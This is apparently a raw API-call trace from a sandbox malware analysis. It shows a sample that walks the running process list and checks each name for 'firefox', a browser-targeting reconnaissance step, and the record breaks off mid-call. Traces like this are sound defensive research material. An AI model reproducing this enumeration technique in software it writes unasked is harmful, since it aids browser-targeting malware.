[0094.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3571a20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0094.901] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0094.901] StrStrIA (lpFirst="sihost.exe", lpSrch="firefox") returned 0x0 [0094.901] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.902] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35717f8 [0094.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35717f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.902] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.902] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox") returned 0x0 [0094.902] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.904] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571780 [0094.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3571780, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.904] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.904] StrStrIA (lpFirst="taskhostw.exe", lpSrch="firefox") returned 0x0 [0094.904] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.905] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571810 [0094.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3571810, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0094.905] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0094.905] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox") returned 0x0 [0094.905] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0094.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.906] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356ce28 [0094.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x356ce28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0094.906] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0094.907] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="firefox") returned 0x0 [0094.907] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0094.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.908] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a4c0 [0094.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356a4c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0094.908] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0094.908] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="firefox") returned 0x0 [0094.908] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0094.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.955] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cca8 [0094.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x356cca8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0094.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0094.955] StrStrIA (lpFirst="Memory Compression", lpSrch="firefox") returned 0x0 [0094.955] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0094.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.956] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x356cd28 [0094.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x356cd28, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0094.957] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0094.957] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="firefox") returned 0x0 [0094.957] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0094.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.958] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571900 [0094.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3571900, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0094.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0094.958] StrStrIA (lpFirst="SearchUI.exe", lpSrch="firefox") returned 0x0 [0094.958] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0094.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.959] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x356ccc8 [0094.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x356ccc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0094.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0094.959] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="firefox") returned 0x0 [0094.959] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.961] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571858 [0094.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3571858, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.961] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox") returned 0x0 [0094.961] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0094.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.963] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571990 [0094.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3571990, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0094.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0094.963] StrStrIA (lpFirst="pending.exe", lpSrch="firefox") returned 0x0 [0094.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0094.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.964] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a8a8 [0094.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356a8a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0094.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0094.964] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="firefox") returned 0x0 [0094.964] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0094.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.965] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356cdc8 [0094.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x356cdc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0094.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0094.965] StrStrIA (lpFirst="swing prefer.exe", lpSrch="firefox") returned 0x0 [0094.966] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0094.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.967] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a8d0 [0094.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356a8d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0094.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0094.967] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="firefox") returned 0x0 [0094.967] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0094.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.968] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cd68 [0094.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x356cd68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0094.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0094.968] StrStrIA (lpFirst="nights-attending.exe", lpSrch="firefox") returned 0x0 [0094.968] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0094.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.969] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571918 [0094.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3571918, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0094.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0094.970] StrStrIA (lpFirst="installed.exe", lpSrch="firefox") returned 0x0 [0094.970] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0094.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.971] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a8f8 [0094.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356a8f8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0094.971] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0094.971] StrStrIA (lpFirst="references compounds.exe", lpSrch="firefox") returned 0x0 [0094.971] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0094.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.973] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cde8 [0094.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x356cde8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0094.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0094.973] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="firefox") returned 0x0 [0094.973] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0094.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.974] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cf68 [0094.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x356cf68, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0094.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0094.974] StrStrIA (lpFirst="registered try.exe", lpSrch="firefox") returned 0x0 [0094.974] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0094.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.976] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356aa10 [0094.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356aa10, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0094.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0094.976] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="firefox") returned 0x0 [0094.976] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0094.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.977] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35719f0 [0094.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x35719f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0094.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0094.977] StrStrIA (lpFirst="invite.exe", lpSrch="firefox") returned 0x0 [0094.977] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0094.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.979] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571960 [0094.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3571960, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0094.979] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0094.979] StrStrIA (lpFirst="idol.exe", lpSrch="firefox") returned 0x0 [0094.979] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0094.980] WideCharToMultiByte (in: 